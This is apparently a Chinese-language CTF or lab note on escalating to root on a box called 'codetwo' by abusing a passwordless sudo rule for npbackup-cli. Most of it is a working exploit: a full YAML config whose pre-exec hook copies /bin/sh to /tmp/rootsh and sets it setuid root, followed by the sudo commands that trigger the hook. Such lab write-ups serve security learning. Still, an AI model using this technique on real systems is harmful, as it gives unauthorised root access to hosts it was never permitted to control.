2.npbackup-cli

created: "2025-08-20 00:12"
tags:
  - npbackup-cli
aliases:
  - sudo-npbackup-cli
  - npbackup-cli提权
Type: 
updated: "2025-08-20 00:13"

marco@codetwo:~#$ sudo -l
Matching Defaults entries for marco on codetwo:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User marco may run the following commands on codetwo:
    `(ALL : ALL) NOPASSWD: /usr/local/bin/npbackup-cli`

npbackup-cli 是一个基于 restic 的备份工具，支持在配置文件中定义 pre-exec 和 post-exec 钩子，这些钩子允许在备份操作前后执行外部命令。此外，它还支持 stdin_from_command 参数，用于从外部命令的输出中获取输入用于备份

先参考家目录下的配置创建一个npbackup的配置文件 npbackup-config.yaml

conf_version: 3.0.1
repos:
  default:
    repo_uri: file:///tmp/backup-repo
    repo_group: exploit_group
    backup_opts:
      paths:
        - /tmp
      source_type: folder_list
      exclude_files_larger_than: 0.0
    repo_opts:
      repo_password: yourpassword
      retention_policy: {}
      prune_max_unused: 0
    prometheus: {}
    env: {}
    is_protected: false
groups:
  exploit_group:
    backup_opts:
      paths: []
      source_type: folder_list
      stdin_from_command: []
      stdin_filename: 
      tags: []
      compression: auto
      use_fs_snapshot: false  # 禁用以简化（无需 VSS）
      ignore_cloud_files: true
      one_file_system: false
      priority: low
      exclude_caches: true
      excludes_case_ignore: false
      exclude_files: []
      exclude_patterns: []
      exclude_files_larger_than: 0
      additional_parameters: []
      additional_backup_only_parameters: []
      minimum_backup_size_error: 10 MiB
      pre_exec_commands:
        - /bin/sh -c "cp /bin/sh /tmp/rootsh && chown root:root /tmp/rootsh && chmod 4777 /tmp/rootsh"
      pre_exec_per_command_timeout: 3600
      pre_exec_failure_is_fatal: false
      post_exec_commands: []
      post_exec_per_command_timeout: 3600
      post_exec_failure_is_fatal: false
      post_exec_execute_even_on_backup_error: true
      post_backup_housekeeping_percent_chance: 0
      post_backup_housekeeping_interval: 0
    repo_opts:
      repo_password: 
      repo_password_command: 
      minimum_backup_age: 1440
      upload_speed: 0
      download_speed: 0
      backend_connections: 0
      retention_policy: {}
      prune_max_unused: 0 B
      prune_max_repack_size: 
    prometheus:
      backup_job: exploit_job
      group: exploit_group
    env:
      env_variables: {}
      encrypted_env_variables: {}
    is_protected: false
identity:
  machine_id: exploit_id
  machine_group: 
global_prometheus:
  metrics: false
  instance: exploit_instance
  destination: 
  http_username: 
  http_password: 
  additional_labels: {}
  no_cert_verify: false
global_options:
  auto_upgrade: false
  auto_upgrade_percent_chance: 5
  auto_upgrade_interval: 15
  auto_upgrade_server_url: 
  auto_upgrade_server_username: 
  auto_upgrade_server_password: 
  auto_upgrade_host_identity: exploit_id
  auto_upgrade_group:

初始化仓库（可以省略）

sudo -u root /usr/local/bin/npbackup-cli --init --config /tmp/npbackup-config.yaml --repo-name default

root 运行备份操作，触发钩子

sudo -u root /usr/local/bin/npbackup-cli -b --config /tmp/npbackup-config.yaml --repo-name default

Pasted image 20250820001056.png